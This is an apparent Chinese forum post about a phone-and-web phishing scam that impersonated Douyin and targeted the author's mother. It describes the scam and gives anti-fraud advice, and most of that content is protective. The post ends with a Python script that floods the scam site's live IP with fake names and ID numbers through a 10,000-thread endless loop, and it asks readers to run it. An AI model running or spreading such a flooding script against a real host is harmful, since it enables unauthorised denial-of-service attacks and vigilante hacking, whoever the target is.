【前情提要】
刚才我收到妈妈发来的微信,微信里是一张截图。截图内容看似来自抖音官方,标题为“关闭抖音百万保障”,但里面要求输入“申请人姓名”和“申请人手机号”,并附有两条令人触目惊心的警告:
- 若不关闭,将自动从实名用户的银行卡、微信、支付宝等账户每月扣款2000元,累计扣款72000元
- 到期未扣取抖音直播会员服务费用,将根据相关条例记录个人征信不良记录,并冻结名下交易渠道
这条消息让我顿时警觉:
【详细经过】
- 可疑电话的来电过程
妈妈随后告诉我,她刚刚接到了一个电话。电话那头自称是抖音官方人员,对方首先问妈妈是否点过某个链接或产品,并声称她“开通”了某项服务。对方明确表示:
- 如果不及时退订,每个月将自动从妈妈的银行卡、微信、支付宝等账户扣除2000元的违约金,累计72000元
- 为了增加可信度,电话中还报出了妈妈身份证的尾号。妈妈本来只是平时用来刷视频,对抖音带货或其他服务毫无兴趣,但对方的说辞以及身份信息的提及让她一时间有些慌乱,不知道如何是好
- 浏览器中出现的疑似“官方”网页
电话中,对方还指引妈妈打开一个链接操作。妈妈按照指引,用浏览器打开了一个网址,并截屏发给了我
- 我第一时间注意到,这个操作页面并非出现在抖音APP内,而是在浏览器中打开,按逻辑来说,正规的操作入口一般不会是这种形式
- 我马上让妈妈把浏览器的URL发给我。果然,页面链接显示为“3.39.23.181”
- 我查了一下,这个IP地址来自
韩国/首尔(amazon.com),与抖音官方域名毫不相干 - 打开该链接后,页面上显示“抖音支付账户安全保障”,下面排列着“银行卡”、“抖音零钱”等多个看似与支付和账户安全有关的功能,但整体设计垃圾得不行,毫无正规的官方风范
- 及时制止泄露个人信息
得知这一情况后,我立即询问妈妈在与对方电话沟通或在该网页上是否输入过任何个人信息。庆幸的是,妈妈想起了她聪明伶俐的小宝贝 Me,没有在网页上填写任何信息,也没有泄露敏感数据 - 进一步核查电话沟通细节
在确认妈妈未有信息泄露后,我继续询问了妈妈电话中的具体内容。了解到:
- 对方在电话中反复强调妈妈可能误操作或误点了某个产品链接,并宣称她开通了某种抖音服务
- 当妈妈表示从未开通过此类服务时,对方立刻反问是否家里孩子或老人误操作,安抚她“没事,现在只需要取消就行”
- 在确认妈妈并未开通任何服务后,对方依然试图说服她尽快通过该网页输入个人信息进行“取消操作”。正是在这一环节,妈妈察觉到事情的蹊跷,便给我发了微信,而我也因此及时介入,避免了可能的经济损失
【建议】
-
核实信息来源:
接到此类电话或看到类似网页时,请务必通过官方渠道(官方网站、官方APP或客服热线)进行核实,切勿轻信非正规通知,不要在来历不明的网页上输入个人信息,如姓名、身份证号、银行卡号等,避免信息泄露 -
做好家人思想工作:
像我这样及时提醒家人和朋友,是防范诈骗的重要措施。希望大家也能互相提醒,共同筑起反诈防线
希望大家引以为戒,切勿因一时慌乱而上当受骗。务必给家人做好思想工作,宣传好反诈意识
另附上诈骗网站,我测试 WinUA 打不开,MacUA 和手机 UA 能打开,大家自行尝试
再附上一个代码,有条件的兄弟可以帮忙上一上
import requests
from faker import Faker
import concurrent.futures
import urllib3
import threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
fake = Faker()
headers = {
'referer': 'https://3.39.23.181/',
}
success_count = 0
lock = threading.Lock()
def submit_request():
global success_count
random_name = fake.name()
random_id_card = fake.ssn()
data = {
'name': random_name,
'idCard': random_id_card
}
url = 'https://3.39.23.181/getContract'
try:
response = requests.post(url, data=data, headers=headers, verify=False)
if response.json().get("code") == 2:
with lock:
success_count += 1
print(f"提交成功次数: {success_count}")
except Exception as e:
pass
# 使用线程池不断提交请求
with concurrent.futures.ThreadPoolExecutor(max_workers=10000) as executor:
while True:
executor.submit(submit_request)
我一直在提交
